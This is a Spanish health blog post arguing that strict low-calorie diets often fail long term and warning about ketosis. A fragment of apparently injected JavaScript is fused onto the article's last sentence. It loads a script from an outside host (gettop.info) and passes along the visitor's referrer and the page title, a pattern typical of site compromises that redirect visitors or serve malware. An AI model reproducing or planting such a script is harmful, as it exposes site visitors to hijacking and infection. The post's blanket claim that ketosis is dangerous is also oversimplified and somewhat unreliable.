Salud y belleza » Alimentación, Salud

Dietas bajas en calorías: ¿solución o engaño?

1 Comentario

1dietaexcesiva

 

El mundo de la nutrición está repleto de dogmas. Pero como ocurre siempre, mientras algunos de ellos son confiables, otros simplemente son….dudosos.
Estos últimos bien podrían ingresar en la categoría de “mitos”: es decir, mensajes que a fuerza de repetirse una y otra vez parecen imponerse con la prepotencia de una verdad de Perogrullo pero que, en el fondo, son simples elucubraciones personales.
La fama de las estrictas y duras “dietas bajas en calorías” bien podrían incluirse en esa columna (o, al menos, la fama de “algunas dietas bajas en calorías”, sobre todo las más rigurosas, para no englobar todos los planes alimenticios que entran en esa regla).

 

¿Cuál es el problema con las dietas bajas en calorías?

Básicamente, las limitaciones que tienen la mayoría de las dietas hipocalóricas son que no son efectivas a largo plazo. La severa reducción alimentaria, ocasionalmente, puede producir el efecto rebote: el sujeto se desmoraliza rápidamente y vuelve a sus viejos hábitos. “El plan dietario perfecto es aquel que se adapta no solo a los deberes del sujeto sino a sus necesidades. De nada sirve mantener un estricto régimen de comidas durante escasos días y, cerrado ese lapso, caer nuevamente en el consumo de esos alimentos que nos hacen perder la línea. En cambio, una dieta combinada que incluya al menos una pequeña cantidad de <<gustos>> producen en el sujeto un cambio radical y fomentan la constancia y fe de éste” afirma un profesional de la salud.

¿Qué es la cetosis?

La cetosis es una reacción metabólica del organismo desencadenada por un déficit en el aporte de carbohidratos. Esto induce el catabolismo de las grasas a fin de obtener energía, generando unos compuestos denominados cuerpos cetónicos. En pocas palabras, en la cetosis el organismo recoge la energía que necesita de los tejidos adiposos y otras sustancias reduciendo nuestro peso.
La cetosis es peligrosa para el cuerpo humano, por ello se debe tener cuidado al momento de seleccionar una dieta y no debemos impresionarnos al ver un menú escueto o un grupo de alimentos reducidos: una buena nutrición no tiene que ver con eso.
Es por ello que, bajo ninguna circunstancia, debemos reducir la presencia de granos, frutas y vegetales en las dietas bajas en hidratos pues, al hacerlo, podríamos conducir a nuestro organismo a deficiencias de nutrientes básicos como la fibra, la vitamina C, el ácido fólico y otros varios minerales (dietas como la “Atkins” y la “PP” fomentan el estado de cetosis a base de reducir drásticamente la ingesta de glúcidos).

La seducción de algunos planes alimenticios puede llevarnos, a veces, por el camino incorrecto. Es por eso que, al elegir una dieta, no debemos basarnos en “mitos” o en “recetas mágicas” sino en métodos sanos aunque realistas que nos ayuden a perder el peso pero no la cabeza.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

One Comment »

  • Bitacoras.com said:

    Información Bitacoras.com…

    Valora en Bitacoras.com:   El mundo de la nutrición está repleto de dogmas. Pero como ocurre siempre, mientras algunos de ellos son confiables, otros simplemente son….dudosos. Estos últimos bien podrían ingresar en la categoría de “mitos”: es decir, …..

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.